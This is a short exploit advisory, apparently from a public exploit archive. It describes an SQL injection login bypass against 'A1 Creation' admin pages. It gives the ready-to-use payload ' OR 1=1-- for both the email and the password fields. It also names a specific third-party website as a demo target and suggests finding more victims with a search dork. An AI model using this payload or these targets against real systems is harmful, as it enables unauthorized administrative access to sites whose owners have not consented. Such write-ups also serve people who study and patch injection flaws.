A1 Creation suffers from a remote SQL injection vulnerability that allows for administrative bypass. Note that this finding houses site-specific data.
fe36a36cf5d6eb81eea38d53885105072118fbcffdaf2dc99d7f4c3bf1960147
____ ____ _____ ___ ___ ____ ____
| \ | / ___/| | | / || \
| D ) | ( \_ | _ _ || o || _ |
| / | |\__ || \_/ || || | |
| \ | |/ \ || | || _ || | |
| . \ | |\ || | || | || | |
|__|\_||____|\___||___|___||__|__||__|__|
# Exploit name: A1 Creation admin page bypass
# Google dork: Make one by yourself !
# Exploit author: Risman
# Tested on: Linux
# Security Risk :
# Category: Web Application
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
# Sample: http://site.com/Admin.aspx
# Demo : http://asianbiographies.com/Admin.aspx
-Email = ' OR 1=1--
-Password = ' OR 1=1--